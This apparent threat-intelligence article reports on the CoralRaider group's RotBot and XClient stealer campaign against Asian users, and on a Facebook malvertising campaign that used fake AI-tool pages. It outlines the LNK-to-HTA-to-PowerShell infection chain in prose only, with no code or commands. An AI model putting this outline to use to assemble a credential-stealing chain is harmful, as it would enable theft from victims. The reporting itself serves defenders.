RotBot Malware

A group believed to originate from Vietnam has been identified as targeting individuals across various Asian and Southeast Asian nations with threatening software aimed at extracting valuable information since at least May 2023. Known as CoralRaider, cybersecurity experts closely monitor this operation, noting its financial motives. The campaign's focal points include India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam.

This cybercriminal syndicate specializes in pilfering credentials, financial records, and social media profiles, encompassing both personal and business accounts. Their arsenal for this particular assault includes RotBot, a customized version of Quasar RAT and the XClient stealer. Additionally, they deploy a range of off-the-shelf malware, such as AsyncRAT, the NetSupport RAT, and Rhadamanthys, aimed at gaining remote access and siphoning information from compromised systems.

Cybercriminals Aim to Compromise Sensitive Information from Selected Targets

Attackers originating from Vietnam have placed a significant emphasis on infiltrating business and advertisement accounts, employing a variety of stealer malware families such as Ducktail, NodeStealer and VietCredCare to seize control of these accounts for subsequent monetization.

Their modus operandi involves the utilization of Telegram to transmit the pilfered information from the victims' machines, which is then exchanged in clandestine markets to generate unlawful profits.

Evidence suggests that the operators of CoralRaider are located in Vietnam, as indicated by the messages from the actors in their Telegram Command and Control (C2) bot channels, as well as their preference for the Vietnamese language in naming their bots, PDB strings, and other Vietnamese terms hardcoded within their payload binaries.

A Multi-stage Infection Chain Delivers the RotBot Malware Threat

The attack sequence initiates with a Windows shortcut file (LNK), although the method of distribution to targets remains unclear. Upon opening the LNK file, an HTML application (HTA) file is downloaded and executed from a server controlled by the attacker, subsequently running an embedded Visual Basic script.

This script, in turn, decrypts and sequentially executes three additional PowerShell scripts responsible for conducting anti-VM and anti-analysis checks, bypassing Windows User Access Control (UAC), deactivating Windows and application notifications, and downloading and executing RotBot.

RotBot is configured to communicate with a Telegram bot, retrieving and executing the XClient stealer malware in memory. This facilitates the theft of cookies, credentials, and financial information from Web browsers such as Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera, as well as Discord and Telegram data and captures screenshots.

Furthermore, XClient is designed to extract data from victims' Facebook, Instagram, TikTok, and YouTube accounts, obtaining information about payment methods and permissions associated with their Facebook business and advertisement accounts.

RotBot, a customized variant of the Quasar RAT client, has been tailored and compiled specifically for this campaign by the threat actor. Additionally, XClient boasts extensive information-stealing capabilities through its plugin module and various functionalities for executing remote administrative tasks.

Infostealers Remain a Considerable Threat Targeting Numerous Sectors

A malvertising campaign on Facebook is exploiting the hype surrounding generative AI tools to promote various information stealers like Rilide, Vidar, IceRAT and a newly emerged threat called Nova Stealer.

The attack begins with the threat actor seizing control of an existing Facebook account and altering its appearance to resemble popular AI tools from Google, OpenAI and Midjourney. They extend their influence by running sponsored advertisements on the platform.

For instance, a counterfeit page posing as Midjourney amassed 1.2 million followers before it was shut down on March 8, 2023. The individuals behind these pages were primarily located in Vietnam, the U.S., Indonesia, the U.K., and Australia, among other countries.

These malvertising campaigns leverage Meta's sponsored ad system to achieve extensive outreach, actively targeting European users in countries such as Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden and beyond.